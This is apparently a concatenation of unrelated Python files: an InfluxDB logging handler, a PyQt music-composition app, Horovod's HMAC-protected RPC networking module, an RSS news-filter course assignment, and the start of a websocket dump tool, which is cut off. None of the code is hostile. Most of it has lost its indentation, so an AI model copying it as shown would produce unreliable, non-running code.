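# measurements, e.g. record.name 'app.db.query' yields points for 'app',
# 'app:db' and 'app:db:query', so queries can aggregate at any level of the
# logger hierarchy.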
names = record.name.split('.')
rname = names[0] or 'root'
ret.append({
"measurement": rname,
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
})
for sub in names[1:]:
rname = f"{rname}:{sub}"
ret.append({
"measurement": rname,
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
})
return ret
class BufferingInfluxHandler(InfluxHandler, BufferingHandler):
"""InfluxDB Log handler
:param capacity: The number of points to buffer before sending to InfluxDB.
:param flush_interval: Interval in seconds between flushes, maximum. Defaults to 5 seconds
:param kwargs: Pass these args to the InfluxHandler
"""
def __init__(self,
capacity: int = 64,
flush_interval: int = 5,
**kwargs
):
self._flush_interval = flush_interval
InfluxHandler.__init__(self, **kwargs)
BufferingHandler.__init__(self, capacity)
self._thread = None if flush_interval is None else threading.Thread(
target=self._flush_thread, name="BufferingInfluxHandler", daemon=True)
if self._thread is not None:
self._thread.start()
def emit(self, record):
BufferingHandler.emit(self, record)
def _flush_thread(self):
while True:
time.sleep(self._flush_interval)
self.flush()
def flush(self):
self.acquire()
try:
if len(self.buffer):
# process all the buffered records
points = []
for record in self.buffer:
points.extend(self._get_point(record))
self._client.write_points(points, retention_policy=self._retention_policy)
# clear the buffer
self.buffer.clear()
finally:
self.release()
class AsyncInfluxHandler(InfluxHandler):
"""InfluxDB Asynchronous logging handler
:param kwargs: Pass these args to the InfluxHandler
"""
_sentinel = None
def __init__(self, **kwargs):
InfluxHandler.__init__(self, **kwargs)
self._queue: Queue = Queue()
self._thread: threading.Thread = threading.Thread(target=self._monitor)
self._thread.daemon = True
self._thread.start()
def _monitor(self):
q = self._queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self._dequeue(True)
if record is self._sentinel:
break
# write record
super().emit(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def _enqueue_sentinel(self):
self._queue.put_nowait(self._sentinel)
def _enqueue(self, record):
self._queue.put_nowait(record)
def _dequeue(self, block):
return self._queue.get(block)
def emit(self, record):
self._enqueue(record)
def stop(self):
self._enqueue_sentinel()
self._thread.join()
self._thread = None
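# --- Minimal usage sketch (illustrative, not part of the original module) ---
# Shows one way these handlers are typically wired up; the database name, host,
# port and the 'request_id' extra below are hypothetical examples, and an
# InfluxDB server must be reachable for the write to succeed.
if __name__ == '__main__':
    example_logger = logging.getLogger('example.app')
    example_logger.setLevel(logging.INFO)
    example_logger.addHandler(
        InfluxHandler(database='logs', measurement='app_logs',
                      host='localhost', port=8086))
    # ints/floats/bools passed via `extra` become fields, other values become tags
    example_logger.info('service started', extra={'request_id': 42})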
|
mainwindow.py
|
# QT
from PyQt5.QtWidgets import QMainWindow, QLabel, QApplication, QFileDialog
from PyQt5.QtGui import QPixmap
from PyQt5 import QtCore
# External
from music21 import *
from pygame import mixer
import pygame
import numpy as np
# Internal
from mainwindow_ui import *
from add_track import *
from about import *
from dialog2 import *
from utils import *
TEMP_MIDI = 'temp.mid' # holds data about current track
LILY_ENABLED = False
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.init_variables()
self.ui.label.setPixmap(QPixmap(''))
self.ui.note1.clicked.connect(self.on_note1_clicked)
self.ui.note2.clicked.connect(self.on_note2_clicked)
self.ui.note3.clicked.connect(self.on_note3_clicked)
self.ui.random_note.clicked.connect(self.on_random_note_clicked)
self.ui.custom_btn.clicked.connect(self.on_custom_btn_clicked)
self.ui.add_track_btn.clicked.connect(self.on_add_track_btn_clicked)
self.ui.comboBox_2.currentIndexChanged.connect(self.on_comboBox_2_currentIndexChanged)
#toolbar buttons
self.ui.actionLoad_File.triggered.connect(self.load_file_clicked)
self.ui.actionOptions.triggered.connect(self.save_file_clicked)
self.ui.actionAbout.triggered.connect(self.displayAbout)
self.ui.actionNew.triggered.connect(self.new_clicked)
self.ui.comboBox.currentIndexChanged.connect(self.on_comboBox_currentIndexChanged)
#view
self.ui.tabWidget.currentChanged.connect(self.on_change_tab)
# audio backend
pygame.init()
# song preview connections
self.ui.playButton.clicked.connect(self.playButton_clicked)
self.ui.pauseButton.clicked.connect(self.pauseButton_clicked)
self.rootfp = getSourceFilePath()
# trackview graph settings
def load_file_clicked(self):
print('load button clicked')
fname, ok = QFileDialog.getOpenFileName(self, 'Open File','./', 'MIDI files (*.mid)')
if ok:
self.load_file(fname)
def load_file(self, fname):
self.new_clicked()
# HACK not actually allowing you to change old data
self.loaded_stream = converter.parse(fname)
self.update_track()
def save_file_clicked(self):
print('save')
fname, ok = QFileDialog.getSaveFileName(self, 'Save File','./', 'MIDI files (*.mid)')
if ok:
temp_stream = self.get_stream()
temp_stream.write('midi', fname)
def new_clicked(self):
print('new!')
self.ui.label.setPixmap(QPixmap(''))
self.init_variables()
self.reset_btns()
self.ui.random_note.setEnabled(False)
self.ui.custom_btn.setEnabled(False)
self.ui.comboBox.setEnabled(False)
self.ui.comboBox.clear()
self.ui.comboBox_2.setCurrentIndex(0)
def displayAbout(self):
print('about')
self.about = About(self)
self.about.show()
def on_change_tab(self):
print('tab change %i' % self.ui.tabWidget.currentIndex())
def on_add_track_btn_clicked(self):
print('add_track')
self.tracks.append(Add_track(self))
self.tracks[-1].show()
def on_comboBox_currentIndexChanged(self, index):
print('index changed to ',index)
if (index < 0):
return
self.cur_track = index
self.reset_btns()
self.update_btns()
def on_comboBox_2_currentIndexChanged(self, index):
self.num_notes = index + 1
def on_note1_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.note1.text())
else:
self.add_note(self.ui.note1)
def on_note2_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.note2.text())
else:
self.add_note(self.ui.note2)
def on_note3_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.note3.text())
else:
self.add_note(self.ui.note3)
def on_random_note_clicked(self):
'''if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
self.play_note_from_text(self.ui.random_note.text())
else:
self.add_note(self.ui.random_note)'''
self.add_note(self.ui.random_note)
def on_custom_btn_clicked(self):
if QApplication.keyboardModifiers() == QtCore.Qt.ShiftModifier:
text = self.ui.custom_note.text()
if (self.try_catch(text) is None):
return
self.play_note_from_text(text)
else:
self.add_note(self.ui.custom_btn)
def add_note(self, btn):
print('add_note ',btn)
for i in range(self.num_notes):
to_app = None
if (btn == self.ui.random_note):
if (self.tracks[self.cur_track].chords):
to_app = self.get_rn_from_num(np.random.randint(0,14))
else:
to_app = note.Note(np.random.randint(40,70))
elif (btn == self.ui.custom_btn):
text = self.ui.custom_note.text()
to_app = self.try_catch(text)
if (to_app is None):
return
else:
if (btn == self.ui.note1):
to_app = self.model_notes[self.cur_track][0]
elif (btn == self.ui.note2):
to_app = self.model_notes[self.cur_track][1]
elif (btn == self.ui.note3):
to_app = self.model_notes[self.cur_track][2]
#Assumes all quarter notes --> magic number is 4
cur_track_noteCount = len(self.s[self.cur_track].flat.notes)
if (cur_track_noteCount % 4 == 0):
self.s[self.cur_track].append(stream.Measure(number=cur_track_noteCount // 4))
self.s[self.cur_track][-1].append(to_app)
self.update_btns(False)
self.update_btns()
self.update_track()
def error_msg(self):
print('error msg')
self.error = Dialog2(self)
self.error.show()
def playButton_clicked(self):
print('play')
temp_mid_path = str( self.rootfp.joinpath('mid', TEMP_MIDI))
temp_stream = self.get_stream()
temp_stream.write('midi',temp_mid_path)
mixer.music.load(temp_mid_path)
mixer.music.play(0)
#thread = threading.Thread(target=self.updateSlider(), args=())
#thread.daemon = True
#thread.start()
def pauseButton_clicked(self):
print('stopping music')
mixer.music.stop()
def update_track(self):
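# Redraw the track view: optionally engrave notation via LilyPond when
# LILY_ENABLED, then render the combined stream as a music21
# HorizontalBarPitchSpaceOffset piano roll with a dark colour scheme, save it
# to img/notes.png and display it in the main label.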
print('update_track')
#self.s = converter.parse("tinyNotation: d'8 f g a b2 c'4 C c c c1")
if LILY_ENABLED is True:
self.s.write('lily.png', self.rootfp.joinpath('img', 'notes.lily'))
pp = QPixmap(str(self.rootfp.joinpath('img', 'notes.lily.png')))
self.ui.label_4.setPixmap(pp)
temp_stream = self.get_stream()
#self.s.show('text')
temp_stream = self.get_stream()
pianoroll = graph.plot.HorizontalBarPitchSpaceOffset(temp_stream)
pianoroll.figureSize = (8,6)
pianoroll.colorBackgroundData = '#000000'
pianoroll.colorBackgroundFigure = '#000000'
pianoroll.colorGrid = '#222222'
pianoroll.alpha = 1.0
pianoroll.colors = ['Cyan', '#fc900a', 'yellow', '#abfd00', '#fc0aab', \
'#fb00ab', '#ef1200', '#bb0222', '#cb10de', '#44dd77', '#4444ff', \
'#0fbcff' ]
pianoroll.doneAction = None
pianoroll.title = None
pianoroll.margin = 0
pianoroll.tickFontSize = 8
#pianoroll.barSpace = 32
#pianoroll.hideLeftBottomSpines = True
self.get_stream().show('text')
pianoroll.run()
pr_path = self.rootfp.joinpath('img', 'notes.png')
pianoroll.subplot.tick_params(axis='x', colors='white')
pianoroll.subplot.tick_params(axis='y', colors='white')
pianoroll.figure.savefig(str(pr_path), facecolor='k')
p = QPixmap( str(pr_path) )
self.ui.label.setPixmap(p)
def update_btns(self, change_text=True):
print('update_btns')
suggestion_btns = [self.ui.note1, self.ui.note2, self.ui.note3]
cur_track_notes = self.s[self.cur_track].flat.notes
if ((len(self.tracks) > self.cur_track) and
(self.tracks[self.cur_track].model is not None) and
(len(cur_track_notes) >= self.tracks[self.cur_track].min_notes)):
base_notes = None
cur_track_obj = self.tracks[self.cur_track]
if (isinstance(cur_track_obj.model, First_markov)):
if (cur_track_obj.chords):
base_notes = chord_to_num[cur_track_notes[-1].figure]
else:
base_notes = cur_track_notes[-1].pitch.midi
elif (isinstance(cur_track_obj.model, Sec_markov)):
if (cur_track_obj.chords):
base_notes = [chord_to_num[cur_track_notes[len(cur_track_notes) - 2].figure], chord_to_num[cur_track_notes[-1].figure]]
else:
base_notes = [cur_track_notes[len(cur_track_notes) - 2].pitch.midi, cur_track_notes[-1].pitch.midi]
self.model_notes[self.cur_track] = num_to_note(cur_track_obj.model.getBestThree(base_notes), cur_track_obj.chords, cur_track_obj)
if (change_text):
for i in range(len(suggestion_btns)):
if (i < len(self.model_notes[self.cur_track])):
suggestion_btns[i].setEnabled(True)
if cur_track_obj.chords:
suggestion_btns[i].setText(self.model_notes[self.cur_track][i].figure)
else:
suggestion_btns[i].setText(self.model_notes[self.cur_track][i].nameWithOctave)
else:
suggestion_btns[i].setEnabled(False)
suggestion_btns[i].setText('Possible Note ' + str(i+1))
def after_add_track(self):
self.ui.comboBox.setEnabled(True)
self.ui.random_note.setEnabled(True)
self.ui.custom_btn.setEnabled(True)
self.s.insert(0, stream.Part())
self.s[-1].append(self.tracks[-1].instrument)
self.model_notes.append([])
self.ui.comboBox.addItem(str(len(self.tracks)))
self.ui.comboBox.setCurrentIndex(len(self.tracks) - 1)
self.reset_btns()
def reset_btns(self):
suggestion_btns = [self.ui.note1, self.ui.note2, self.ui.note3]
for i in range(len(suggestion_btns)):
suggestion_btns[i].setEnabled(False)
suggestion_btns[i].setText('Possible Note ' + str(i+1))
def init_variables(self):
self.s = stream.Score()
self.tracks = []
self.model_notes = []
self.cur_track = 0
self.num_notes = 1
self.loaded_stream = None
def get_stream(self):
ret = stream.Stream()
ret.insert(0, self.s)
if (self.loaded_stream is not None):
ret.insert(0, self.loaded_stream)
return ret
def get_rn_from_num(self, num):
rand_rn = num_to_chord[num]
return roman.RomanNumeral(rand_rn, self.tracks[self.cur_track].key)
def play_note_from_text(self, n):
to_play = None
if (self.tracks[self.cur_track].chords):
to_play = roman.RomanNumeral(n, self.tracks[self.cur_track].key)
else:
to_play = note.Note(n)
temp_mid_path = str( self.rootfp.joinpath('mid', TEMP_MIDI))
to_play.write('midi',temp_mid_path)
mixer.music.load(temp_mid_path)
mixer.music.play(0)
def try_catch(self,text):
to_app = None
try:
if (self.tracks[self.cur_track].chords):
if text not in chord_to_num:
raise pitch.AccidentalException
to_app = roman.RomanNumeral(text, self.tracks[self.cur_track].key)
else:
to_app = note.Note(text)
return to_app
except (pitch.AccidentalException, roman.RomanException, pitch.PitchException):
self.error_msg()
print('exception found')
return None
def num_to_note(num_list, chords, cur_track_obj):
ret = []
for elem in num_list:
n = None
if (chords):
n = roman.RomanNumeral(num_to_chord[elem],cur_track_obj.key)
else:
n = note.Note(elem)
ret.append(n)
return ret
|
network.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
class PingRequest(object):
pass
class NoValidAddressesFound(Exception):
pass
class PingResponse(object):
def __init__(self, service_name, source_address):
self.service_name = service_name
"""Service name that responded to this ping."""
self.source_address = source_address
"""Source IP address that was visible to the service."""
class AckResponse(object):
"""Used for situations when the response does not carry any data."""
pass
class Wire(object):
"""
Used for serialization/deserialization of objects over the wire.
We use HMAC to protect services from unauthorized use. The key used for
the HMAC digest is distributed by Open MPI and Spark.
The objects are serialized using cloudpickle. Serialized objects become
the body of the message.
Structure of the message is as follows:
- HMAC digest of the body (32 bytes)
- length of the body (4 bytes)
- body
"""
def __init__(self, key):
self._key = key
def write(self, obj, wfile):
message = cloudpickle.dumps(obj)
digest = secret.compute_digest(self._key, message)
wfile.write(digest)
# Pack message length into 4-byte integer.
wfile.write(struct.pack('i', len(message)))
wfile.write(message)
wfile.flush()
def read(self, rfile):
digest = rfile.read(secret.DIGEST_LENGTH)
# Unpack message length into 4-byte integer.
message_len = struct.unpack('i', rfile.read(4))[0]
message = rfile.read(message_len)
if not secret.check_digest(self._key, message, digest):
raise Exception('Security error: digest did not match the message.')
return cloudpickle.loads(message)
class BasicService(object):
def __init__(self, service_name, key):
self._service_name = service_name
self._wire = Wire(key)
self._server = self._make_server()
self._port = self._server.socket.getsockname()[1]
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
def _make_server(self):
min_port = 1024
max_port = 65536
num_ports = max_port - min_port
start_port = random.randrange(0, num_ports)
for port_offset in range(num_ports):
try:
port = min_port + (start_port + port_offset) % num_ports
return socketserver.ThreadingTCPServer(('0.0.0.0', port), self._make_handler())
except:
pass
raise Exception('Unable to find a port to bind to.')
def _make_handler(self):
server = self
class _Handler(socketserver.StreamRequestHandler):
def handle(self):
try:
req = server._wire.read(self.rfile)
resp = server._handle(req, self.client_address)
if not resp:
raise Exception('Handler did not return a response.')
server._wire.write(resp, self.wfile)
except EOFError:
# Happens when client is abruptly terminated, don't want to pollute the logs.
pass
return _Handler
def _handle(self, req, client_address):
if isinstance(req, PingRequest):
return PingResponse(self._service_name, client_address[0])
raise NotImplementedError(req)
def addresses(self):
result = {}
for intf, intf_addresses in psutil.net_if_addrs().items():
for addr in intf_addresses:
if addr.family == socket.AF_INET:
if intf not in result:
result[intf] = []
result[intf].append((addr.address, self._port))
return result
def shutdown(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def get_port(self):
return self._port
class BasicClient(object):
def __init__(self, service_name, addresses, key, match_intf=False,
probe_timeout=20, retries=3):
# Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
self._service_name = service_name
self._wire = Wire(key)
self._match_intf = match_intf
self._probe_timeout = probe_timeout
self._retries = retries
self._addresses = self._probe(addresses)
if not self._addresses:
raise NoValidAddressesFound(
'Unable to connect to the %s on any of the addresses: %s'
% (service_name, addresses))
def _probe(self, addresses):
result_queue = queue.Queue()
threads = []
for intf, intf_addresses in addresses.items():
for addr in intf_addresses:
thread = threading.Thread(target=self._probe_one,
args=(intf, addr, result_queue))
thread.daemon = True
thread.start()
threads.append(thread)
for t in threads:
t.join()
result = {}
while not result_queue.empty():
intf, addr = result_queue.get()
if intf not in result:
result[intf] = []
result[intf].append(addr)
return result
def _probe_one(self, intf, addr, result_queue):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self._probe_timeout)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(PingRequest(), wfile)
resp = self._wire.read(rfile)
if resp.service_name != self._service_name:
return
if self._match_intf:
# Interface name of destination and source must match
# since `match_intf` is requested.
client_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(intf, [])
if x.family == socket.AF_INET]
if resp.source_address not in client_intf_addrs:
return
result_queue.put((intf, addr))
return
finally:
rfile.close()
wfile.close()
except:
pass
finally:
sock.close()
def _send_one(self, addr, req):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(req, wfile)
resp = self._wire.read(rfile)
return resp
finally:
rfile.close()
wfile.close()
except:
if iter == self._retries - 1:
# Raise exception on the last retry.
raise
finally:
sock.close()
def _send(self, req):
# Since all the addresses were vetted, use the first one.
addr = list(self._addresses.values())[0][0]
return self._send_one(addr, req)
def addresses(self):
return self._addresses
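# --- Minimal usage sketch (illustrative, not part of the original module) ---
# Demonstrates the ping handshake between BasicService and BasicClient on one
# machine. secret.make_secret_key() is assumed to be available here; any bytes
# key accepted by secret.compute_digest()/check_digest() would work instead.
if __name__ == '__main__':
    key = secret.make_secret_key()  # assumed helper; substitute a shared key of your own
    service = BasicService('demo service', key)
    client = BasicClient('demo service', service.addresses(), key)
    print('service reachable at:', client.addresses())
    service.shutdown()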
|
app.py
|
from receiver import receiveCount
from webServer import webserver
from multiprocessing import Process
p2 = Process(target=receiveCount)
p2.start()
p1 = Process(target=webserver)
p1.start()
# and so on
p2.join()
p1.join()
# join: wait until each process has finished
|
ps5.py
|
# 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name: Daniel Sprehe
# Date: 4/16/2020
import feedparser
import string
import time
import threading
from ps5_project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
# -----------------------------------------------------------------------
# ======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
# ======================
def process(url):
"""
Fetches news items from the rss url and parses them.
Returns a list of NewsStory-s.
"""
feed = feedparser.parse(url)
entries = feed.entries
ret = []
for entry in entries:
guid = entry.guid
title = translate_html(entry.title)
link = entry.link
description = translate_html(entry.description)
pubdate = translate_html(entry.published)
try:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
            pubdate = pubdate.replace(tzinfo=pytz.timezone("GMT"))
# pubdate = pubdate.astimezone(pytz.timezone('EST'))
# pubdate.replace(tzinfo=None)
except ValueError:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
newsStory = NewsStory(guid, title, description, link, pubdate)
ret.append(newsStory)
return ret
# ======================
# Data structure design
# ======================
# Problem 1
class NewsStory:
def __init__(self, guid, title, description, link, pubdate):
self.guid = guid
self.title = title
self.description = description
self.link = link
self.pubdate = pubdate
def get_guid(self):
return self.guid
def get_title(self):
return self.title
def get_description(self):
return self.description
def get_link(self):
return self.link
def get_pubdate(self):
return self.pubdate
# ======================
# Triggers
# ======================
class Trigger(object):
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
# DO NOT CHANGE THIS!
raise NotImplementedError
# PHRASE TRIGGERS
# Problem 2
class PhraseTrigger(Trigger):
def __init__(self, phrase):
self.phrase = phrase.lower()
def is_phrase_in(self, text):
new_text = ''
# Clean the text
for symbol in string.punctuation:
text = text.replace(symbol, ' ')
split_text = text.split()
for word in split_text:
new_text += word.strip() + ' '
# Check the text for the phrase
if self.phrase.lower() in new_text.lower():
for word in self.phrase.lower().split():
if word in new_text.lower().split():
continue
else:
return False
return True
else:
return False
# Problem 3
class TitleTrigger(PhraseTrigger):
def __init__(self, phrase):
super().__init__(phrase)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
if self.is_phrase_in(story.get_title()):
return True
else:
return False
# Problem 4
class DescriptionTrigger(PhraseTrigger):
def __init__(self, phrase):
super().__init__(phrase)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
if self.is_phrase_in(story.get_description()):
return True
else:
return False
# TIME TRIGGERS
# Problem 5
class TimeTrigger(Trigger):
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
def __init__(self, time):
self.time = datetime.strptime(time, "%d %b %Y %H:%M:%S").replace(
tzinfo=pytz.timezone("EST"))
# Problem 6
class BeforeTrigger(TimeTrigger):
def __init__(self, time):
super().__init__(time)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.time > story.get_pubdate().replace(tzinfo=pytz.timezone("EST"))
class AfterTrigger(TimeTrigger):
def __init__(self, time):
super().__init__(time)
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.time < story.get_pubdate().replace(tzinfo=pytz.timezone("EST"))
# COMPOSITE TRIGGERS
# Problem 7
class NotTrigger(Trigger):
def __init__(self, OtherTrigger):
self.OtherTrigger = OtherTrigger
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return not self.OtherTrigger.evaluate(story)
# Problem 8
class AndTrigger(Trigger):
def __init__(self, Trigger1, Trigger2):
self.Trigger1 = Trigger1
self.Trigger2 = Trigger2
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.Trigger1.evaluate(story) and self.Trigger2.evaluate(story)
# Problem 9
class OrTrigger(Trigger):
def __init__(self, Trigger1, Trigger2):
self.Trigger1 = Trigger1
self.Trigger2 = Trigger2
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
return self.Trigger1.evaluate(story) or self.Trigger2.evaluate(story)
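# Illustrative sketch (not part of the assignment solution): composing the
# triggers defined above. The phrases below are placeholders.
def _example_composite_trigger():
    t_title = TitleTrigger("election")
    t_desc = DescriptionTrigger("vote")
    # Fires when the title mentions "election" and the description does NOT
    # mention "vote".
    return AndTrigger(t_title, NotTrigger(t_desc))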
# ======================
# Filtering
# ======================
# Problem 10
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
    new_stories = []
    for story in stories:
        for trig in triggerlist:
            if trig.evaluate(story):
                new_stories.append(story)
                break  # a story matching several triggers is added only once
    return new_stories
# ======================
# User-Specified Triggers
# ======================
def trigger_list_dictionary(triggerlines):
triggers = {}
for line in triggerlines:
line = line.split(',')
if line[0][0] == 't':
if line[1] == 'TITLE':
triggers[line[0]] = TitleTrigger(line[2])
if line[1] == 'DESCRIPTION':
triggers[line[0]] = DescriptionTrigger(line[2])
if line[1] == 'AFTER':
triggers[line[0]] = AfterTrigger(line[2])
if line[1] == 'BEFORE':
triggers[line[0]] = BeforeTrigger(line[2])
if line[1] == 'NOT':
triggers[line[0]] = NotTrigger(triggers[line[2]])
if line[1] == 'AND':
triggers[line[0]] = AndTrigger(
triggers[line[2]], triggers[line[3]])
if line[1] == 'OR':
triggers[line[0]] = OrTrigger(
triggers[line[2]], triggers[line[3]])
return triggers
# Problem 11
def read_trigger_config(filename):
"""
filename: the name of a trigger configuration file
Returns: a list of trigger objects specified by the trigger configuration
file.
"""
# We give you the code to read in the file and eliminate blank lines and
# comments. You don't need to know how it works for now!
trigger_file = open(filename, 'r')
lines = []
triggerlist = []
for line in trigger_file:
line = line.rstrip()
if not (len(line) == 0 or line.startswith('//')):
lines.append(line)
# TODO: Problem 11
# line is the list of lines that you need to parse and for which you need
# to build triggers
trigger_dict = trigger_list_dictionary(lines)
for line in lines:
line = line.split(',')
if line[0] == 'ADD':
for triggers in line:
if triggers[0] == 't':
triggerlist.append(trigger_dict[triggers])
return triggerlist
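# Example of the trigger configuration format parsed above (a sketch of what
# ps5_triggers.txt might contain; phrases and the date are illustrative):
#
#   // blank lines and lines starting with // are ignored
#   t1,TITLE,election
#   t2,DESCRIPTION,Clinton
#   t3,AFTER,3 Oct 2016 17:00:10
#   t4,AND,t2,t3
#   ADD,t1,t4
#
# Trigger names must start with 't' (see trigger_list_dictionary), and the
# ADD line selects which named triggers end up in the returned list.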
SLEEPTIME = 120 # seconds -- how often we poll
def main_thread(master):
# A sample trigger list - you might need to change the phrases to correspond
# to what is currently in the news
try:
'''t1 = TitleTrigger("election")
t2 = DescriptionTrigger("Trump")
t3 = DescriptionTrigger("Clinton")
t4 = AndTrigger(t2, t3)
triggerlist = [t1, t4]'''
# Problem 11
# TODO: After implementing read_trigger_config, uncomment this line
triggerlist = read_trigger_config('ps5_triggers.txt')
# HELPER CODE - you don't need to understand this!
# Draws the popup window that displays the filtered stories
# Retrieves and filters the stories from the RSS feeds
frame = Frame(master)
frame.pack(side=BOTTOM)
scrollbar = Scrollbar(master)
scrollbar.pack(side=RIGHT, fill=Y)
t = "Top News"
title = StringVar()
title.set(t)
ttl = Label(master, textvariable=title, font=("Helvetica", 18))
ttl.pack(side=TOP)
cont = Text(master, font=("Helvetica", 14), yscrollcommand=scrollbar.set)
cont.pack(side=BOTTOM)
cont.tag_config("title", justify='center')
button = Button(frame, text="Exit", command=root.destroy)
button.pack(side=BOTTOM)
guidShown = []
def get_cont(newstory):
if newstory.get_guid() not in guidShown:
cont.insert(END, newstory.get_title()+"\n", "title")
cont.insert(
END, "\n---------------------------------------------------------------\n", "title")
cont.insert(END, newstory.get_description())
cont.insert(
END, "\n*********************************************************************\n", "title")
guidShown.append(newstory.get_guid())
while True:
print("Polling . . .", end=' ')
stories = []
# Get stories from Google's Top Stories RSS news feed
stories += process("http://news.google.com/news?output=rss")
# Get stories from more RSS feeds
# Reddit has error - No published Attribute
# stories += process("https://www.reddit.com/r/worldnews/.rss")
# Reddit has error - No description Attribute
# stories += process("https://news.yahoo.com/rss/topstories")
stories = filter_stories(stories, triggerlist)
list(map(get_cont, stories))
scrollbar.config(command=cont.yview)
print("Sleeping...")
time.sleep(SLEEPTIME)
except Exception as e:
print(e)
if __name__ == '__main__':
root = Tk()
root.title("Some RSS parser")
t = threading.Thread(target=main_thread, args=(root,))
t.start()
root.mainloop()
|
wsdump.py
|
#!/Users/Amish/Development/Trading/gemini-trading-app2/venv/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
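# Example invocation (illustrative; the echo URL comes from the help text
# above, the message is a placeholder):
#
#   python wsdump.py ws://echo.websocket.org/ -v -t "hello" --timings
#
# -v prints the opcode with each message, -t sends an initial text frame,
# and --timings prefixes output with seconds elapsed since startup.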
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
